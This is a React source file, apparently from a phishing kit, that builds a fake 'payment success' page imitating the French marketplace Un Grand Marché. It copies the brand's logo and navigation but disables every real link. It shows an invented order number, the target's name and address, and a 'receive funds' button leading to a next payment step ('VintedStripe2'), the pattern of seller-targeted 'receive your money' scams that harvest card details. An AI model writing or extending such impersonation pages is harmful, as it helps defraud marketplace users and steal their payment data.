import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './UnGrandMarcheFrSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { unGrandMarcheFrSuccessCopy as c } from '../unGrandMarcheFrSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/ungrandmarche-fr-logo.png`;
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/ungrandmarche-fr-footer.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function orderRefFromCode(pageCode) {
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) {
    h = (h * 31 + pageCode.charCodeAt(i)) >>> 0;
  }
  return String(1000 + (h % 9000));
}

function IconUser() {
  return (
    <svg className="ugm-ico-btn" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.6" aria-hidden>
      <path d="M20 21a8 8 0 0 0-16 0" strokeLinecap="round" />
      <circle cx="12" cy="8" r="4" />
    </svg>
  );
}

function IconCart() {
  return (
    <svg className="ugm-ico-btn" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.6" aria-hidden>
      <path d="M6 6h15l-1.5 9h-12z" strokeLinejoin="round" />
      <path d="M6 6 5 3H2" strokeLinecap="round" />
      <circle cx="9" cy="20" r="1" fill="currentColor" stroke="none" />
      <circle cx="18" cy="20" r="1" fill="currentColor" stroke="none" />
    </svg>
  );
}

function IconTruck() {
  return (
    <svg className="ugm-ship-ico" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.5" aria-hidden>
      <path d="M1 3h15v13H1z" />
      <path d="M16 8h4l3 4v4h-7" />
      <circle cx="5.5" cy="18.5" r="2" />
      <circle cx="18.5" cy="18.5" r="2" />
    </svg>
  );
}

/**
 * Un Grand Marché (FR) — après captcha → index2 (VintedStripe2).
 */
function UnGrandMarcheFrSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'FR').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(Math.round(priceNumber))
        : String(priceNumber);

  const amountPaidDisplay = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const fullName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const orderRef = orderRefFromCode(pageCode || pageData?.page_code || '');

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="ugm-wrap">
        <p className="ugm-loading">{c.loading}</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="ugm-wrap">
      <header className="ugm-header">
        <div className="ugm-header-inner">
          <a href="#/" className="ugm-brand" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="Un Grand Marché" className="ugm-brand-img" width={62} height={70} decoding="async" />
          </a>
          <div className="ugm-pills" aria-label="Rayons">
            <span className="ugm-pill ugm-pill--on">{c.navCreation}</span>
            <span className="ugm-pill">{c.navMercerie}</span>
            <span className="ugm-pill">{c.navCosmetique}</span>
          </div>
          <div className="ugm-search">
            <input type="search" readOnly placeholder={c.searchPlaceholder} aria-label={c.searchPlaceholder} />
            <span className="ugm-search-ico" aria-hidden />
          </div>
          <div className="ugm-header-tools">
            <a href="#/" onClick={(e) => e.preventDefault()}>
              {c.blog}
            </a>
            <button type="button" className="ugm-ico-btn" aria-label="Compte" onClick={(e) => e.preventDefault()}>
              <IconUser />
            </button>
            <button type="button" className="ugm-ico-btn" aria-label="Panier" onClick={(e) => e.preventDefault()}>
              <IconCart />
            </button>
          </div>
        </div>
      </header>

      <div className="ugm-subnav">
        <div className="ugm-subnav-inner">{c.subnav}</div>
      </div>

      <main className="ugm-main">
        <div className="ugm-main-inner">
          <nav className="ugm-bc" aria-label="Fil d'Ariane">
            {c.breadcrumbOrders} / <strong>{c.breadcrumbFunds}</strong>
          </nav>

          <div className="ugm-grid">
            <div className="ugm-photo-wrap">
              {showPhoto ? (
                <img className="ugm-photo" src={photoSrc} alt="" onError={() => setImgFailed(true)} decoding="async" />
              ) : (
                <div className="ugm-photo-ph" aria-hidden />
              )}
            </div>

            <div className="ugm-panel">
              <h1 className="ugm-order-id">{orderRef}</h1>
              <div className="ugm-paid-row">
                <div className="ugm-paid-label">{c.paidLabel}</div>
                <div className="ugm-paid-amount">{amountPaidDisplay}</div>
              </div>
              <div className="ugm-lines">
                <p>
                  <span>{c.buyerName}</span> {fullName}
                </p>
                <p>
                  <span>{c.buyerAddress}</span> {address}
                </p>
              </div>
              <Link to={index2Path} className="ugm-cta">
                {c.ctaReceive}
              </Link>
              <div className="ugm-trust-pay">
                <span className="ugm-card-ico" aria-hidden />
                <span>{c.trustPay}</span>
              </div>
              <div className="ugm-ship">
                <IconTruck />
                <span>{c.shippingLine}</span>
              </div>
              <p className="ugm-legal" onClick={(e) => e.preventDefault()} role="presentation">
                {c.legalLinks}
              </p>
            </div>
          </div>
        </div>
      </main>

      <footer className="ugm-footer">
        <img src={FOOTER_SRC} alt="" className="ugm-footer-img" width={1024} height={226} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default UnGrandMarcheFrSuccess;
